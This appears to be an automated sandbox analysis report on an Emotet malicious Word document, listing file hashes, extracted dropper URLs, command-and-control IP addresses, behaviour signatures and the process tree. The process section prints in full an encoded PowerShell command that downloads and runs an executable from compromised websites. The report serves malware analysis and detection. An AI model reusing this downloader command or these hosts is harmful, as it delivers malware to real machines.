Analysis

  • max time kernel
    69s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    17-09-2020 13:18

General

  • Target

    emotet_e2_24c7551200e919fc0bdce151aef784c0c324c81a337a8bf70e67cfebf1abae0d_2020-09-17__131708._doc.doc

  • Size

    172KB

  • MD5

    af5701e6c5f9bd86f09a46875323fbfc

  • SHA1

    02429e66570b6b347c3357c559d27e5211f11eb1

  • SHA256

    24c7551200e919fc0bdce151aef784c0c324c81a337a8bf70e67cfebf1abae0d

  • SHA512

    b73d3296ce25058d7b6f2560cb66af5bd066c11ed46570d82106aaf1c08ccdfbce8adfd322008ddfacb968254372f277d2aa1ea7459399dda687c0a85a030c64

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://rhyton-building.com/wp-admin/Ey8qV0/

exe.dropper

http://ezzll.com/wp-includes/KIU2WU/

exe.dropper

http://tellmetech.com/wp-content/4ka/

exe.dropper

https://elmundodelareposteria.com/wp-admin/0PVVmJm/

exe.dropper

https://manuelrozas.cl/assets/XWN/

exe.dropper

https://haritdharni.com/wp-admin/bZM/

exe.dropper

https://theworks-group.com/site/pQT6j5/

Extracted

Family

emotet

C2

74.219.172.26:80

134.209.36.254:8080

104.156.59.7:8080

120.138.30.150:8080

194.187.133.160:443

104.236.246.93:8080

74.208.45.104:8080

78.187.156.31:80

187.161.206.24:80

94.23.216.33:80

172.91.208.86:80

91.211.88.52:7080

50.91.114.38:80

200.123.150.89:443

121.124.124.40:7080

62.75.141.82:80

5.196.74.210:8080

24.137.76.62:80

85.105.205.77:8080

139.130.242.43:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 8 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_24c7551200e919fc0bdce151aef784c0c324c81a337a8bf70e67cfebf1abae0d_2020-09-17__131708._doc.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:752
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -encod JABVAGgAeABxADQAbAB1AD0AKAAoACcAQwBzACcAKwAnAGQAaQBuACcAKQArACcAawAnACsAJwAwACcAKQA7ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAUgBwAFIATwBmAEkATABFAFwAdQBvAGYAVwBzAFUAdgBcAGwAbgB4AFkATgA2AF8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBDAFQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABFAGAAQwBgAFUAcgBJAFQAeQBwAHIAYABvAFQATwBjAE8AbAAiACAAPQAgACgAJwB0ACcAKwAnAGwAJwArACgAJwBzADEAMgAsACcAKwAnACAAdAAnACsAJwBsACcAKQArACgAJwBzACcAKwAnADEAJwArACcAMQAsACAAdABsAHMAJwApACkAOwAkAEYAegBnAGEAdQAwAGUAIAA9ACAAKAAnAE0AJwArACcAagBsACcAKwAoACcAegBpAGYAJwArACcAbQB1ACcAKQApADsAJABDADQAaQA5AHgANQBuAD0AKAAoACcAUgBoACcAKwAnAG0AJwApACsAJwBtACcAKwAoACcAegBxACcAKwAnAHMAJwApACkAOwAkAEQAOAA5AGkAdwB2AGsAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwBiAEMAJwArACcAUgBVAG8AZgB3ACcAKQArACcAcwB1ACcAKwAnAHYAYgAnACsAKAAnAEMAUgBMAG4AJwArACcAeAB5ACcAKQArACcAbgA2ACcAKwAnAF8AYgAnACsAJwBDACcAKwAnAFIAJwApACAAIAAtAGMAUgBFAHAAbABhAEMAZQAoACcAYgBDACcAKwAnAFIAJwApACwAWwBjAGgAYQBSAF0AOQAyACkAKwAkAEYAegBnAGEAdQAwAGUAKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABTAHQAYQBxAG0AcgBmAD0AKAAnAEEAJwArACgAJwBnAGUAJwArACcAdAAnACkAKwAoACcAawBrACcAKwAnAHkAJwApACkAOwAkAFcAdQBiADMAbQAxAHQAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAEIAQwBMAGkAZQBuAFQAOwAkAEEAbgB6AGwAOQB1AGsAPQAoACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcAA6ACcAKwAnAC8ALwAnACkAKwAoACcAcgBoACcAKwAnAHkAJwApACsAJwB0ACcAKwAnAG8AJwArACcAbgAtACcAKwAoACcAYgB1ACcAKwAnAGkAbABkACcAKQArACgAJwBpAG4AJwArACcAZwAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAvACcAKwAnAHcAcAAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwAnACsAJwBFAHkAOABxAFYAJwArACcAMAAvACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAOgAnACkAKwAoACcALwAvACcAKwAnAGUAegAnACkAKwAoACcAegBsACcAKwAnAGwAJwApACsAKAAnAC4AJwArACcAYwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AaQBuACcAKwAnAGMAJwApACsAJwBsAHUAJwArACgAJwBkAGUAJwArACcAcwAvAEsASQBVADIAVwBVACcAKwAnAC8AJwApACsAJwAqAGgAJwArACcAdAAnACsAKAAnAHQAJwArACcAcAA6AC8ALwB0ACcAKwAnAGUAbAAnACkAKwAoACcAbAAnACsAJwBtAGUAJwApACsAKAAnAHQAJwArACcAZQBjACcAKQArACgAJwBoAC4AJwArACcAYwAnACkAKwAoACcAbwBtACcAKwAnAC8AdwBwAC0AYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwApACsAKAAnAHQAJwArACcALwA0AGsAJwApACsAJwBhACcAKwAoACcALwAnACsAJwAqAGgAdAB0AHAAJwApACsAKAAnAHMAJwArACcAOgAvAC8AZQBsAG0AJwApACsAKAAnAHUAbgBkAG8AJwArACcAZABlAGwAJwArACcAYQByACcAKQArACgAJwBlAHAAbwBzAHQAJwArACcAZQAnACkAKwAnAHIAJwArACcAaQAnACsAJwBhACcAKwAnAC4AJwArACgAJwBjAG8AbQAnACsAJwAvAHcAcAAnACsAJwAtACcAKQArACgAJwBhACcAKwAnAGQAbQAnACkAKwAnAGkAJwArACgAJwBuAC8AMAAnACsAJwBQAFYAJwApACsAKAAnAFYAbQBKAG0ALwAqACcAKwAnAGgAJwArACcAdAAnACkAKwAoACcAdABwACcAKwAnAHMAOgAvAC8AbQBhACcAKQArACgAJwBuACcAKwAnAHUAZQAnACkAKwAnAGwAJwArACgAJwByAG8AegBhACcAKwAnAHMALgBjAGwALwAnACkAKwAnAGEAJwArACgAJwBzAHMAZQAnACsAJwB0ACcAKwAnAHMAJwArACcALwBYAFcATgAvACoAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKwAnAHMAJwArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGgAJwArACgAJwBhAHIAJwArACcAaQB0AGQAaABhACcAKQArACgAJwByAG4AaQAuAGMAJwArACcAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAcAAtAGEAJwArACcAZAAnACkAKwAoACcAbQBpAG4ALwBiACcAKwAnAFoATQAvACcAKwAnACoAaAB0ACcAKQArACgAJwB0AHAAJwArACcAcwA6AC8ALwB0ACcAKQArACcAaABlACcAKwAoACcAdwAnACsAJwBvAHIAawBzAC0AZwByAG8AdQAnACsAJwBwACcAKwAnAC4AJwArACcAYwBvAG0AJwArACcALwBzACcAKQArACgAJwBpAHQAJwArACcAZQAvAHAAUQAnACkAKwAoACcAVAAnACsAJwA2AGoAJwApACsAJwA1AC8AJwApAC4AIgBTAFAAYABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEMAZQAxAHMAbABzAHEAPQAoACcAVAB1ACcAKwAnAHoAYwAnACsAKAAnAHgAJwArACcAbAA0ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAUAB2AHMAZQBkAG4AMwAgAGkAbgAgACQAQQBuAHoAbAA5AHUAawApAHsAdAByAHkAewAkAFcAdQBiADMAbQAxAHQALgAiAGQATwBXAG4AYABsAG8AQQBgAEQAYABGAEkAbABFACIAKAAkAFAAdgBzAGUAZABuADMALAAgACQARAA4ADkAaQB3AHYAawApADsAJABWADcAdAB4AG0AZABfAD0AKAAnAFEAJwArACgAJwA1ADkAcQAxACcAKwAnADYAbwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABEADgAOQBpAHcAdgBrACkALgAiAEwAYABlAG4ARwBUAGgAIgAgAC0AZwBlACAAMgA4ADIANwA5ACkAIAB7AC4AKAAnAEkAbgB2AG8AJwArACcAawBlACcAKwAnAC0ASQB0AGUAbQAnACkAKAAkAEQAOAA5AGkAdwB2AGsAKQA7ACQATABqAHUAMQBfAHMAaAA9ACgAJwBJACcAKwAoACcAMQA0ACcAKwAnADQAJwApACsAKAAnAGQAJwArACcANAB6ACcAKQApADsAYgByAGUAYQBrADsAJABIAHoAcAAzAGEAdQBfAD0AKAAoACcAQwA3ACcAKwAnAHMAdQAnACkAKwAoACcAYQAwACcAKwAnADcAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAcwBnAGMAaQBlADYAPQAoACgAJwBIAHYAJwArACcAXwBvACcAKQArACcAZwA1ACcAKwAnAHQAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Users\Admin\Uofwsuv\Lnxyn6_\Mjlzifmu.exe
      "C:\Users\Admin\Uofwsuv\Lnxyn6_\Mjlzifmu.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:324
      • C:\Windows\SysWOW64\kbdlk41a\uxtheme.exe
        "C:\Windows\SysWOW64\kbdlk41a\uxtheme.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:1996

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Uofwsuv\Lnxyn6_\Mjlzifmu.exe
  • C:\Users\Admin\uofWsUv\lnxYN6_\Mjlzifmu.exe
  • C:\Windows\SysWOW64\kbdlk41a\uxtheme.exe
  • memory/324-13-0x0000000000000000-mapping.dmp
  • memory/324-16-0x0000000000240000-0x0000000000250000-memory.dmp
    Filesize

    64KB

  • memory/324-15-0x00000000002D0000-0x00000000002E2000-memory.dmp
    Filesize

    72KB

  • memory/752-4-0x0000000007470000-0x0000000007670000-memory.dmp
    Filesize

    2.0MB

  • memory/752-2-0x0000000008B70000-0x0000000008B74000-memory.dmp
    Filesize

    16KB

  • memory/1112-22-0x000007FEF6D90000-0x000007FEF700A000-memory.dmp
    Filesize

    2.5MB

  • memory/1196-8-0x000000001AB20000-0x000000001AB21000-memory.dmp
    Filesize

    4KB

  • memory/1196-12-0x000000001C380000-0x000000001C381000-memory.dmp
    Filesize

    4KB

  • memory/1196-11-0x000000001AA00000-0x000000001AA01000-memory.dmp
    Filesize

    4KB

  • memory/1196-10-0x00000000023B0000-0x00000000023B1000-memory.dmp
    Filesize

    4KB

  • memory/1196-9-0x00000000024C0000-0x00000000024C1000-memory.dmp
    Filesize

    4KB

  • memory/1196-7-0x00000000022E0000-0x00000000022E1000-memory.dmp
    Filesize

    4KB

  • memory/1196-6-0x000007FEF1D50000-0x000007FEF273C000-memory.dmp
    Filesize

    9.9MB

  • memory/1996-18-0x0000000000000000-mapping.dmp
  • memory/1996-20-0x0000000000260000-0x0000000000272000-memory.dmp
    Filesize

    72KB

  • memory/1996-21-0x00000000001D0000-0x00000000001E0000-memory.dmp
    Filesize

    64KB